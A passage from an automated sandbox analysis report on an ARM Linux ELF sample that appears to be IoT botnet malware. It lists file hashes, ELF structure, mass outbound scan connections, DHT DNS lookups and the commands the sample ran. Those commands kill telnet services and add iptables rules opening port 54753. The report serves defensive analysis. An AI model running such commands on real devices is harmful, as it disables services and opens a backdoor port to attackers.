                                                                                                                            Entropy (8bit):3.882045108136863
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:qXVOORgn:Tn
                                                                                                                            MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                            SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                            SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                            SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                            Malicious:false
                                                                                                                            Preview: ./usr/networks&.exit 1.

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                            Entropy (8bit):5.819679405566689
                                                                                                                            TrID:
                                                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                                            File name:rIbyGX66Op
                                                                                                                            File size:307960
                                                                                                                            MD5:eec5c6c219535fba3a0492ea8118b397
                                                                                                                            SHA1:292559e94f1c04b7d0c65d4a01bbbc5dc1ff6f21
                                                                                                                            SHA256:12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef
                                                                                                                            SHA512:3482c8324a18302f0f37b6e23ed85f24fff9f50bb568d8fd7461bf57f077a7c592f7a88bb2e1c398699958946d87bb93ab744d13a0003f9b879c15e6471f7400
                                                                                                                            SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                            File Content Preview:.ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L..................@-.,@...0....S

                                                                                                                            Static ELF Info

                                                                                                                            ELF header

                                                                                                                            Class:ELF32
                                                                                                                            Data:2's complement, little endian
                                                                                                                            Version:1 (current)
                                                                                                                            Machine:ARM
                                                                                                                            Version Number:0x1
                                                                                                                            Type:EXEC (Executable file)
                                                                                                                            OS/ABI:UNIX - System V
                                                                                                                            ABI Version:0
                                                                                                                            Entry Point Address:0x8194
                                                                                                                            Flags:0x4000002
                                                                                                                            ELF Header Size:52
                                                                                                                            Program Header Offset:52
                                                                                                                            Program Header Size:32
                                                                                                                            Number of Program Headers:5
                                                                                                                            Section Header Offset:307280
                                                                                                                            Section Header Size:40
                                                                                                                            Number of Section Headers:17
                                                                                                                            Header String Table Index:16

                                                                                                                            Sections

                                                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                                            NULL0x00x00x00x00x0000
                                                                                                                            .initPROGBITS0x80d40xd40x100x00x6AX004
                                                                                                                            .textPROGBITS0x80f00xf00x34a980x00x6AX0016
                                                                                                                            .finiPROGBITS0x3cb880x34b880x100x00x6AX004
                                                                                                                            .rodataPROGBITS0x3cb980x34b980xb9d00x00x2A008
                                                                                                                            .ARM.extabPROGBITS0x485680x405680x180x00x2A004
                                                                                                                            .ARM.exidxARM_EXIDX0x485800x405800x1280x00x82AL204
                                                                                                                            .eh_framePROGBITS0x510000x410000x40x00x3WA004
                                                                                                                            .tbssNOBITS0x510040x410040x80x00x403WAT004
                                                                                                                            .init_arrayINIT_ARRAY0x510040x410040x40x00x3WA004
                                                                                                                            .fini_arrayFINI_ARRAY0x510080x410080x40x00x3WA004
                                                                                                                            .data.rel.roPROGBITS0x510100x410100x180x00x3WA004
                                                                                                                            .gotPROGBITS0x510280x410280xb80x40x3WA004
                                                                                                                            .dataPROGBITS0x510e00x410e00x9ec80x00x3WA008
                                                                                                                            .bssNOBITS0x5afa80x4afa80x25b900x00x3WA008
                                                                                                                            .ARM.attributesARM_ATTRIBUTES0x00x4afa80x160x00x0001
                                                                                                                            .shstrtabSTRTAB0x00x4afbe0x900x00x0001

                                                                                                                            Program Segments

                                                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                                            EXIDX0x405800x485800x485800x1280x1280x4R 0x4.ARM.exidx
                                                                                                                            LOAD0x00x80000x80000x406a80x406a80x5R E0x8000.init .text .fini .rodata .ARM.extab .ARM.exidx
                                                                                                                            LOAD0x410000x510000x510000x9fa80x2fb380x6RW 0x8000.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
                                                                                                                            TLS0x410040x510040x510040x00x80x4R 0x4
                                                                                                                            GNU_STACK0x00x00x00x00x00x7RWE0x4

                                                                                                                            Network Behavior

                                                                                                                            Network Port Distribution

                                                                                                                            TCP Packets

                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Apr 25, 2021 21:13:17.522315025 CEST3852080192.168.2.20178.40.184.137
                                                                                                                            Apr 25, 2021 21:13:17.522470951 CEST3416081192.168.2.20140.39.206.54
                                                                                                                            Apr 25, 2021 21:13:17.522475004 CEST5124680192.168.2.2034.8.155.116
                                                                                                                            Apr 25, 2021 21:13:17.522525072 CEST3362080192.168.2.20108.184.4.136
                                                                                                                            Apr 25, 2021 21:13:17.522631884 CEST3289880192.168.2.20221.160.8.201
                                                                                                                            Apr 25, 2021 21:13:17.522634029 CEST601108443192.168.2.20108.39.69.131
                                                                                                                            Apr 25, 2021 21:13:17.522691965 CEST4776081192.168.2.20131.99.110.247
                                                                                                                            Apr 25, 2021 21:13:17.522747993 CEST387388080192.168.2.203.51.62.125
                                                                                                                            Apr 25, 2021 21:13:17.522758007 CEST4922880192.168.2.2067.118.131.139
                                                                                                                            Apr 25, 2021 21:13:17.522809029 CEST331528443192.168.2.2028.86.70.243
                                                                                                                            Apr 25, 2021 21:13:17.522860050 CEST3985680192.168.2.2089.235.62.86
                                                                                                                            Apr 25, 2021 21:13:17.522907019 CEST4280680192.168.2.205.75.82.42
                                                                                                                            Apr 25, 2021 21:13:17.522962093 CEST522828080192.168.2.20171.112.221.128
                                                                                                                            Apr 25, 2021 21:13:17.523019075 CEST382468080192.168.2.2085.117.188.205
                                                                                                                            Apr 25, 2021 21:13:17.523057938 CEST4527249152192.168.2.20105.109.18.186
                                                                                                                            Apr 25, 2021 21:13:17.523154020 CEST4314437215192.168.2.2029.5.215.81
                                                                                                                            Apr 25, 2021 21:13:17.523170948 CEST352368443192.168.2.208.114.30.17
                                                                                                                            Apr 25, 2021 21:13:17.523191929 CEST5477280192.168.2.2019.112.11.89
                                                                                                                            Apr 25, 2021 21:13:17.523236990 CEST398007574192.168.2.204.186.238.93
                                                                                                                            Apr 25, 2021 21:13:17.523294926 CEST4841449152192.168.2.2085.124.222.42
                                                                                                                            Apr 25, 2021 21:13:17.523339033 CEST4952080192.168.2.20212.9.178.122
                                                                                                                            Apr 25, 2021 21:13:17.523389101 CEST4445680192.168.2.20123.152.1.95
                                                                                                                            Apr 25, 2021 21:13:17.523444891 CEST573447574192.168.2.2013.229.32.133
                                                                                                                            Apr 25, 2021 21:13:17.523493052 CEST3348049152192.168.2.20138.94.203.237
                                                                                                                            Apr 25, 2021 21:13:17.523525000 CEST3499480192.168.2.20132.84.208.189
                                                                                                                            Apr 25, 2021 21:13:17.523580074 CEST603668080192.168.2.2084.219.17.176
                                                                                                                            Apr 25, 2021 21:13:17.523633003 CEST6085649152192.168.2.20165.94.66.173
                                                                                                                            Apr 25, 2021 21:13:17.523665905 CEST3876080192.168.2.20116.56.146.125
                                                                                                                            Apr 25, 2021 21:13:17.523715973 CEST422908443192.168.2.20163.60.176.218
                                                                                                                            Apr 25, 2021 21:13:17.523813963 CEST5973037215192.168.2.20174.9.64.0
                                                                                                                            Apr 25, 2021 21:13:17.523873091 CEST5087052869192.168.2.20217.196.154.24
                                                                                                                            Apr 25, 2021 21:13:17.523930073 CEST389607574192.168.2.2043.162.206.133
                                                                                                                            Apr 25, 2021 21:13:17.523972034 CEST5005480192.168.2.20197.46.69.196
                                                                                                                            Apr 25, 2021 21:13:17.524029016 CEST347348080192.168.2.2079.58.62.70
                                                                                                                            Apr 25, 2021 21:13:17.524070024 CEST5425649152192.168.2.20180.195.241.242
                                                                                                                            Apr 25, 2021 21:13:17.524132013 CEST5548249152192.168.2.20113.203.125.76
                                                                                                                            Apr 25, 2021 21:13:17.524199963 CEST4881480192.168.2.20190.166.22.140
                                                                                                                            Apr 25, 2021 21:13:17.524231911 CEST333328443192.168.2.20124.94.21.94
                                                                                                                            Apr 25, 2021 21:13:17.524283886 CEST4446480192.168.2.2018.184.123.158
                                                                                                                            Apr 25, 2021 21:13:17.524343967 CEST5338481192.168.2.20125.178.212.248
                                                                                                                            Apr 25, 2021 21:13:17.524379969 CEST5246849152192.168.2.20181.215.101.174
                                                                                                                            Apr 25, 2021 21:13:17.524441004 CEST598208080192.168.2.20146.97.112.184
                                                                                                                            Apr 25, 2021 21:13:17.524491072 CEST5365080192.168.2.20179.8.250.180
                                                                                                                            Apr 25, 2021 21:13:17.524529934 CEST5531280192.168.2.205.71.214.240
                                                                                                                            Apr 25, 2021 21:13:17.524565935 CEST5609437215192.168.2.20113.237.9.87
                                                                                                                            Apr 25, 2021 21:13:17.524621964 CEST4072680192.168.2.20182.151.134.212
                                                                                                                            Apr 25, 2021 21:13:17.524672031 CEST5509080192.168.2.2075.104.12.143
                                                                                                                            Apr 25, 2021 21:13:17.524724960 CEST384427574192.168.2.2065.192.2.39
                                                                                                                            Apr 25, 2021 21:13:17.524765968 CEST6009281192.168.2.2083.106.49.27
                                                                                                                            Apr 25, 2021 21:13:17.524826050 CEST561008443192.168.2.20100.221.5.250
                                                                                                                            Apr 25, 2021 21:13:17.525018930 CEST579227574192.168.2.2074.164.3.48
                                                                                                                            Apr 25, 2021 21:13:17.525096893 CEST5603080192.168.2.2023.24.50.230
                                                                                                                            Apr 25, 2021 21:13:17.525151014 CEST3993852869192.168.2.2070.83.19.226
                                                                                                                            Apr 25, 2021 21:13:17.525208950 CEST5422680192.168.2.20126.190.241.252
                                                                                                                            Apr 25, 2021 21:13:17.525259018 CEST558988443192.168.2.20121.204.171.153
                                                                                                                            Apr 25, 2021 21:13:17.525309086 CEST496528443192.168.2.2061.114.5.135
                                                                                                                            Apr 25, 2021 21:13:17.525434017 CEST5995680192.168.2.2085.190.86.196
                                                                                                                            Apr 25, 2021 21:13:17.525485992 CEST5984481192.168.2.20219.13.241.116
                                                                                                                            Apr 25, 2021 21:13:17.525537968 CEST4778880192.168.2.20168.166.178.133
                                                                                                                            Apr 25, 2021 21:13:17.525589943 CEST3480480192.168.2.20197.58.62.163
                                                                                                                            Apr 25, 2021 21:13:17.525635004 CEST423688443192.168.2.20221.79.66.124
                                                                                                                            Apr 25, 2021 21:13:17.525696039 CEST506407574192.168.2.20111.176.24.214
                                                                                                                            Apr 25, 2021 21:13:17.525751114 CEST461588080192.168.2.2079.29.184.178
                                                                                                                            Apr 25, 2021 21:13:17.525794983 CEST3832637215192.168.2.20158.130.170.201
                                                                                                                            Apr 25, 2021 21:13:17.525862932 CEST424267574192.168.2.20133.39.215.101
                                                                                                                            Apr 25, 2021 21:13:17.525913954 CEST5765080192.168.2.209.32.68.114
                                                                                                                            Apr 25, 2021 21:13:17.525973082 CEST4665080192.168.2.20141.198.8.138
                                                                                                                            Apr 25, 2021 21:13:17.525998116 CEST344008080192.168.2.2095.245.196.212
                                                                                                                            Apr 25, 2021 21:13:17.526056051 CEST5516880192.168.2.20157.129.13.198
                                                                                                                            Apr 25, 2021 21:13:17.526102066 CEST419067574192.168.2.2015.115.105.212
                                                                                                                            Apr 25, 2021 21:13:17.526153088 CEST4634049152192.168.2.20199.218.221.131
                                                                                                                            Apr 25, 2021 21:13:17.526196957 CEST5896681192.168.2.20173.150.244.104
                                                                                                                            Apr 25, 2021 21:13:17.526251078 CEST377045555192.168.2.20157.94.79.109
                                                                                                                            Apr 25, 2021 21:13:17.526304007 CEST444365555192.168.2.20137.81.200.232
                                                                                                                            Apr 25, 2021 21:13:17.526367903 CEST5187281192.168.2.20101.196.228.55
                                                                                                                            Apr 25, 2021 21:13:17.526418924 CEST4209880192.168.2.20146.89.168.209
                                                                                                                            Apr 25, 2021 21:13:17.526464939 CEST4658881192.168.2.20187.188.141.244
                                                                                                                            Apr 25, 2021 21:13:17.526516914 CEST402308080192.168.2.2090.205.13.29
                                                                                                                            Apr 25, 2021 21:13:17.526563883 CEST589405555192.168.2.2029.150.145.46
                                                                                                                            Apr 25, 2021 21:13:17.526609898 CEST4155849152192.168.2.2092.77.238.132
                                                                                                                            Apr 25, 2021 21:13:17.526662111 CEST581427574192.168.2.20168.120.224.251
                                                                                                                            Apr 25, 2021 21:13:17.526709080 CEST502368080192.168.2.2095.75.250.127
                                                                                                                            Apr 25, 2021 21:13:17.526745081 CEST5582680192.168.2.20204.15.237.59
                                                                                                                            Apr 25, 2021 21:13:17.526801109 CEST5160480192.168.2.2040.17.191.13
                                                                                                                            Apr 25, 2021 21:13:17.526851892 CEST3298481192.168.2.20196.95.13.165
                                                                                                                            Apr 25, 2021 21:13:17.526895046 CEST548748080192.168.2.20167.55.9.142
                                                                                                                            Apr 25, 2021 21:13:17.526928902 CEST576128443192.168.2.20196.37.30.71
                                                                                                                            Apr 25, 2021 21:13:17.526988029 CEST4409080192.168.2.2077.211.237.86
                                                                                                                            Apr 25, 2021 21:13:17.527038097 CEST583827574192.168.2.2084.138.43.63
                                                                                                                            Apr 25, 2021 21:13:17.527084112 CEST539248080192.168.2.20150.78.74.139
                                                                                                                            Apr 25, 2021 21:13:17.527126074 CEST3526280192.168.2.20133.161.230.38
                                                                                                                            Apr 25, 2021 21:13:17.527168989 CEST344028080192.168.2.2090.251.63.152
                                                                                                                            Apr 25, 2021 21:13:17.527213097 CEST5345649152192.168.2.2092.171.56.228
                                                                                                                            Apr 25, 2021 21:13:17.527256966 CEST362005555192.168.2.20152.1.210.168
                                                                                                                            Apr 25, 2021 21:13:17.527302027 CEST524247574192.168.2.20181.63.57.94
                                                                                                                            Apr 25, 2021 21:13:17.527340889 CEST4932080192.168.2.2017.103.205.243
                                                                                                                            Apr 25, 2021 21:13:17.527386904 CEST4072037215192.168.2.2082.134.248.77
                                                                                                                            Apr 25, 2021 21:13:17.527435064 CEST3414252869192.168.2.20186.149.104.105
                                                                                                                            Apr 25, 2021 21:13:17.527482033 CEST4898481192.168.2.20166.120.234.132
                                                                                                                            Apr 25, 2021 21:13:17.527538061 CEST4552637215192.168.2.20148.53.105.39

                                                                                                                            DNS Queries

                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                            Apr 25, 2021 21:13:36.913734913 CEST192.168.2.208.8.8.80x2Standard query (0)dht.transmissionbt.comA (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:36.974586964 CEST192.168.2.208.8.8.80x3Standard query (0)router.bittorrent.comA (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.028383017 CEST192.168.2.208.8.8.80x4Standard query (0)router.utorrent.comA (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.078749895 CEST192.168.2.208.8.8.80x5Standard query (0)bttracker.debian.orgA (IP address)IN (0x0001)

                                                                                                                            DNS Answers

                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                            Apr 25, 2021 21:13:36.972640991 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com212.129.33.59A (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:36.972640991 CEST8.8.8.8192.168.2.200x2No error (0)dht.transmissionbt.com87.98.162.88A (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.026236057 CEST8.8.8.8192.168.2.200x3No error (0)router.bittorrent.com67.215.246.10A (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.076781988 CEST8.8.8.8192.168.2.200x4No error (0)router.utorrent.com82.221.103.244A (IP address)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.140028954 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.debian.orgbttracker.acc.umu.seCNAME (Canonical name)IN (0x0001)
                                                                                                                            Apr 25, 2021 21:13:37.140028954 CEST8.8.8.8192.168.2.200x5No error (0)bttracker.acc.umu.se130.239.18.159A (IP address)IN (0x0001)

                                                                                                                            HTTP Request Dependency Graph

                                                                                                                            • 34.90.159.216:80
                                                                                                                            • 127.0.0.1:80
                                                                                                                            • 121.5.104.125:80
                                                                                                                            • 164.125.103.242:80
                                                                                                                            • 127.0.0.1:8080
                                                                                                                            • 69.195.90.130:80
                                                                                                                            • 220.130.214.100:80
                                                                                                                            • 3.11.29.16:80
                                                                                                                            • 104.72.178.146:80
                                                                                                                            • 95.217.3.9:80

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:/usr/bin/qemu-arm /tmp/rIbyGX66Op
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/usr/bin/killall
                                                                                                                            Arguments:killall -9 telnetd utelnetd scfgmgr
                                                                                                                            File size:23736 bytes
                                                                                                                            MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:11
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:26
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --destination-port 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:n/a
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/modprobe
                                                                                                                            Arguments:/sbin/modprobe ip_tables
                                                                                                                            File size:9 bytes
                                                                                                                            MD5 hash:3d0e6fb594a9ad9c854ace3e507f86c5

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --source-port 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I PREROUTING -t nat -p tcp --destination-port 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I POSTROUTING -t nat -p tcp --source-port 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I INPUT -p tcp --dport 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I OUTPUT -p tcp --sport 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:n/a
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/sbin/iptables
                                                                                                                            Arguments:iptables -I PREROUTING -t nat -p tcp --dport 54753 -j ACCEPT
                                                                                                                            File size:13 bytes
                                                                                                                            MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/tmp/rIbyGX66Op
                                                                                                                            Arguments:n/a
                                                                                                                            File size:307960 bytes
                                                                                                                            MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                                            General

                                                                                                                            Start time:21:13:27
                                                                                                                            Start date:25/04/2021
                                                                                                                            Path:/bin/sh
                                                                                                                            Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 54753 -j ACCEPT"
                                                                                                                            File size:4 bytes
                                                                                                                            MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                                            General

                                                                                                                            Start time:21:13:27
